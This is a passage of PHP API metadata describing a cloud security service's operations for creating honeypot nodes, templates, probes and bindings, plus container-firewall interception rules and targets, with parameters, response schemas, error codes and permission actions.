''], ['errorCode' => 'AuthorizedProbeCannotReduce', 'errorMessage' => 'The number of authorized probes cannot be reduced.', 'description' => ''], ['errorCode' => 'InvalidProbeNum', 'errorMessage' => 'Invalid number of probes.', 'description' => ''], ['errorCode' => 'ProbeNumInsufficient', 'errorMessage' => 'The number of probes remaining is insufficient.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'Service error, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6BF880\\",\\n \\"HttpStatusCode\\": 200,\\n \\"HoneypotNode\\": {\\n \\"NodeId\\": \\"37a15ff1-3475-4897-aa6c-f7fd9122****\\"\\n }\\n}","type":"json"}]', 'title' => 'CreateHoneypotNode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateHoneypotNode', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotNode', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotnode/*'], ], ], ], ], ], 'CreateHoneypotPreset' => [ 'summary' => 'Creates a honeypot template.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'HoneypotImageName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot image.'."\n", 'type' => 'string', 'required' => true, 'example' => 'webmin'], ], [ 'name' => 'PresetName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom name of the honeypot template.'."\n", 'type' => 'string', 'required' => true, 'example' => 'WebMin-online'], ], [ 'name' => 'Meta', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom configurations of the honeypot template. The value is a JSON string that contains the following fields:'."\n" ."\n" .'* **portrait_option**: Social Source Tracing'."\n" .'* **burp**: Burp-specific Defense'."\n" .'* **trojan_git**: Git-specific Defense'."\n", 'type' => 'string', 'required' => true, 'example' => '{"burp":"close","trojan_git":"close","portrait_option":"true"}'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node to which you want to deploy honeypots.'."\n" ."\n" .'> You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to query the IDs of management nodes.'."\n", 'type' => 'string', 'required' => true, 'example' => '9373fe59-74d5-4505-bb24-c85352fb****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7C1C6E65-C8B9-54C9-9F92-2F5E51C4E16D', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'HoneypotPreset' => [ 'description' => 'The creation result.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotPresetId' => ['description' => 'The ID of the honeypot template.'."\n", 'type' => 'string', 'example' => 'd6ece172-34d9-4942-99a4-b309cb55xxxx', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"7C1C6E65-C8B9-54C9-9F92-2F5E51C4E16D\\",\\n \\"HttpStatusCode\\": 200,\\n \\"HoneypotPreset\\": {\\n \\"HoneypotPresetId\\": \\"d6ece172-34d9-4942-99a4-b309cb55xxxx\\"\\n }\\n}","type":"json"}]', 'title' => 'CreateHoneypotPreset', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateHoneypotPreset', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotPreset', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotpreset/*'], ], ], ], ], ], 'CreateHoneypotProbe' => [ 'summary' => 'Creates a probe.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'ControlNodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n" ."\n" .'> You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to query the IDs of management nodes.'."\n", 'type' => 'string', 'required' => true, 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], [ 'name' => 'ProbeType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The type of the probe. Valid values:'."\n" ."\n" .'* **host_probe**: host probe'."\n" .'* **vpc_black_hole_probe**: virtual private cloud (VPC) probe'."\n", 'type' => 'string', 'required' => true, 'example' => 'host_probe'], ], [ 'name' => 'DisplayName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the probe.'."\n", 'type' => 'string', 'required' => true, 'example' => 'testHoneyPotProbe'], ], [ 'name' => 'ProbeVersion', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The version of the probe.'."\n", 'type' => 'string', 'required' => false, 'example' => '0.0.0'], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The UUID of the instance.'."\n" ."\n" .'> If **ProbeType** is set to **host_probe**, this parameter is required.'."\n", 'type' => 'string', 'required' => false, 'example' => 'e4af3620-6895-4e2f-a641-a9d8fb53****'], ], [ 'name' => 'BusinessGroupId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the business group.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022011817324588686'], ], [ 'name' => 'HoneypotBindList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The configuration of the probe.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the configuration.'."\n", 'type' => 'object', 'properties' => [ 'BindPortList' => [ 'description' => 'The listener ports.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The listener port.'."\n", 'type' => 'object', 'properties' => [ 'TargetPort' => ['description' => 'The destination port.'."\n" ."\n" .'> If **HoneypotId** is specified, this parameter is required.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], 'StartPort' => ['description' => 'The start of the port range.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], 'EndPort' => ['description' => 'The end of the port range.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '90', 'title' => ''], 'Fixed' => ['description' => 'Specifies whether the port is a fixed port. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'boolean', 'required' => false, 'example' => '0', 'title' => ''], 'BindPort' => ['description' => 'Specifies whether to bind a port. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], 'HoneypotId' => ['description' => 'The ID of the honeypot.'."\n" ."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to query the IDs of honeypots.'."\n", 'type' => 'string', 'required' => false, 'example' => '1a5eda2d40f92ac87d6b63e1a5ad4b76fe0d4110c4a3e2fa85438a29ae55****', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'example' => '', ], ], [ 'name' => 'Ping', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to enable ping scan. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true'], ], [ 'name' => 'Arp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to enable Address Resolution Protocol (ARP) spoofing. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true'], ], [ 'name' => 'VpcId', 'in' => 'query', 'schema' => ['title' => 'vpcId', 'description' => 'The ID of the VPC.'."\n" ."\n" .'> If **ProbeType** is set to **vpc_black_hole_probe**, this parameter is required. You can call the [DescribeVpcHoneyPotList](~~DescribeVpcHoneyPotList~~) operation to query the IDs of VPCs.'."\n", 'type' => 'string', 'required' => false, 'example' => 'vpc-zm0asrkpv1q8gnk7mn4dn'], ], [ 'name' => 'ProxyIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the proxy.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The returned result.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'B7A839E8-70AE-591D-8D9E-C5419A2240DB', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'HoneypotProbe' => [ 'description' => 'The information about the probe.'."\n", 'type' => 'object', 'properties' => [ 'ProbeId' => ['description' => 'The ID of the probe.'."\n", 'type' => 'string', 'example' => 'b69e9aa8-2ea8-4c5a-836a-c1fbacff****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AgentNotOnline', 'errorMessage' => 'The agent not online.', 'description' => 'The error message returned because the Security Center agent is offline. Make sure that the Security Center agent is online and try again.'], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'NodeNotExist', 'errorMessage' => 'The control node does not exist.', 'description' => ''], ['errorCode' => 'BindPortAlreadyExist', 'errorMessage' => 'The specified service port already exists.', 'description' => ''], ['errorCode' => 'MachineNotExist', 'errorMessage' => 'The machine does not exist.', 'description' => ''], ['errorCode' => 'ProbeAlreadyCreate', 'errorMessage' => 'The probe has been created.', 'description' => ''], ['errorCode' => 'ProbeNameAlreadyExists', 'errorMessage' => 'The probe name already exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"B7A839E8-70AE-591D-8D9E-C5419A2240DB\\",\\n \\"HttpStatusCode\\": 200,\\n \\"HoneypotProbe\\": {\\n \\"ProbeId\\": \\"b69e9aa8-2ea8-4c5a-836a-c1fbacff****\\"\\n }\\n}","type":"json"}]', 'title' => 'CreateHoneypotProbe', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateHoneypotProbe', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotProbe', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotprobe/*'], ], ], ], ], ], 'CreateHoneypotProbeBind' => [ 'summary' => 'Creates a monitoring or forwarding service for a probe.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe ID.'."\n" ."\n" .'> You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to query the IDs of probes.'."\n", 'type' => 'string', 'required' => false, 'example' => '36bad711-d1ac-4419-ac68-c1aa280f****'], ], [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The honeypot ID.'."\n" ."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to query the IDs of honeypots.'."\n", 'type' => 'string', 'required' => false, 'example' => 'dba7d44775be8e0e5888ee3b1a62554a93d2512247cabc38ddeac17a3b3f****'], ], [ 'name' => 'ServiceIpList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The IP addresses that are monitored.'."\n", 'type' => 'array', 'items' => ['description' => 'The IP address that is monitored.'."\n", 'type' => 'string', 'required' => false, 'example' => '0.0.0.0', 'title' => ''], 'required' => false, 'maxItems' => 20, 'example' => '', ], ], [ 'name' => 'BindPortList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The ports that are bound to the probe.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'TargetPort' => ['description' => 'The destination port.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '8080', 'title' => ''], 'StartPort' => ['description' => 'The start port on which the probe monitors.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], 'EndPort' => ['description' => 'The end port on which the probe monitors.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], 'Fixed' => ['description' => 'Specifies whether the port is a fixed port. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], 'BindPort' => ['description' => 'Specifies whether to bind the port. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], 'Proto' => ['description' => 'The type of the protocol. Valid values:'."\n" ."\n" .'* **tcp**'."\n" .'* **udp**'."\n", 'type' => 'string', 'required' => false, 'example' => 'tcp', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'E10BAF1C-A6C5-51E2-866C-76D5922E****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code that is returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'BindPortAlreadyExist', 'errorMessage' => 'The specified service port already exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"E10BAF1C-A6C5-51E2-866C-76D5922E****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'CreateHoneypotProbeBind', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateHoneypotProbeBind', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateHybridProxyCluster' => [ 'summary' => 'Creates a hybrid-cloud proxy cluster.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '151826', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The description of the cluster.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testRemark', 'title' => ''], ], [ 'name' => 'Ip', 'in' => 'query', 'schema' => ['description' => 'The endpoint of the cluster.'."\n" .'> You can specify an IP address or a domain name', 'type' => 'string', 'required' => true, 'docRequired' => true, 'example' => '117.71.xx.xx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'CDCB0BBB-CFB2-5D38-BB49-500E2A21xxxx', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataExists', 'errorMessage' => '%s data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateHybridProxyCluster', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateHybridProxyCluster'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateHybridProxyCluster', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CDCB0BBB-CFB2-5D38-BB49-500E2A21xxxx\\"\\n}","type":"json"}]', ], 'CreateInterceptionRule' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of container clusters.'."\n", 'type' => 'string', 'required' => true, 'example' => 'c35xxxa416', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the defense rule.'."\n", 'type' => 'string', 'required' => true, 'example' => 'test-rule-1', 'title' => ''], ], [ 'name' => 'RuleSwitch', 'in' => 'query', 'schema' => ['description' => 'Specifies the status of the defense rule. Valid values:'."\n" ."\n" .'* **0**: disables the rule.'."\n" .'* **1**: enables the rule.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'SrcTarget', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The source network object. The value of this parameter contains the following field:'."\n" ."\n" .'* targetId: the ID of the source network object. You can call the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to query the ID.'."\n", 'type' => 'object', 'required' => false, 'example' => '{"targetId":301940}', 'title' => ''], ], [ 'name' => 'DstTargetList', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The information about the destination network object. The value of this parameter contains the following fields:'."\n" ."\n" .'* targetId: the ID of the destination network object. You can call the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to query the ID.'."\n" .'* ports: the destination port ranges.'."\n", 'type' => 'object', 'required' => false, 'example' => '['."\n" .' {'."\n" .' "targetId": 600036,'."\n" .' "ports": ['."\n" .' "1/65535"'."\n" .' ]'."\n" .' }'."\n" .']', 'title' => ''], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The type of the defense rule. Valid values:'."\n" ."\n" .'* customize: custom rule'."\n", 'type' => 'string', 'required' => false, 'example' => 'customize', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sas-test-cnnf', 'title' => ''], ], [ 'name' => 'OrderIndex', 'in' => 'query', 'schema' => ['description' => 'The priority of the defense rule. Valid values: 1 to 1000. A smaller value indicates a higher priority.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'InterceptType', 'in' => 'query', 'schema' => ['description' => 'The action on traffic. Valid values:'."\n" ."\n" .'* **1**: blocks traffic.'."\n" .'* **2**: allows traffic and generates alerts.'."\n" .'* **3**: allows traffic and does not generate alerts.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'A01810A0-xxx5E2676', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'CreateInterceptionRule', 'summary' => 'Creates a defense rule in the container firewall module.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateInterceptionRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateInterceptionRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A01810A0-xxx5E2676\\"\\n}","type":"json"}]', ], 'CreateInterceptionTarget' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91928', 'abilityTreeNodes' => ['FEATUREsas5HPCI8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TargetName', 'in' => 'query', 'schema' => ['description' => 'The name of the object to be blocked.'."\n", 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The object type. Valid value:'."\n" ."\n" .'* **IMAGE**'."\n", 'type' => 'string', 'required' => true, 'example' => 'IMAGE', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace to which the network object belongs.'."\n", 'type' => 'string', 'required' => true, 'example' => 'default', 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The name of the application to which the network object belongs.'."\n", 'type' => 'string', 'required' => false, 'example' => 'frontend', 'title' => ''], ], [ 'name' => 'ImageList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'An array that consists of the images of the network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The information about the image.'."\n", 'type' => 'string', 'required' => false, 'example' => 'jenkins-master:2.277', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'TagList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'An array that consists of the labels specified for the network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The information about the tag.'."\n", 'type' => 'string', 'required' => false, 'example' => 'app.kubernetes.io/instance:cas0-oms', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cc20a1024011c44b6a8710d6f8b****', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The cluster name.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas-test-cnnf', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Result' => ['description' => 'The response parameters.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '5B9ECCC0-38F7-***', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateInterceptionTarget', 'summary' => 'Creates a defense object.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateInterceptionTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateInterceptionTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Result\\": true,\\n \\"RequestId\\": \\"5B9ECCC0-38F7-***\\"\\n}","type":"json"}]', ], 'CreateJenkinsImageRegistry' => [ 'summary' => 'Creates a Jenkins image repository.', 'methods' => ['post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 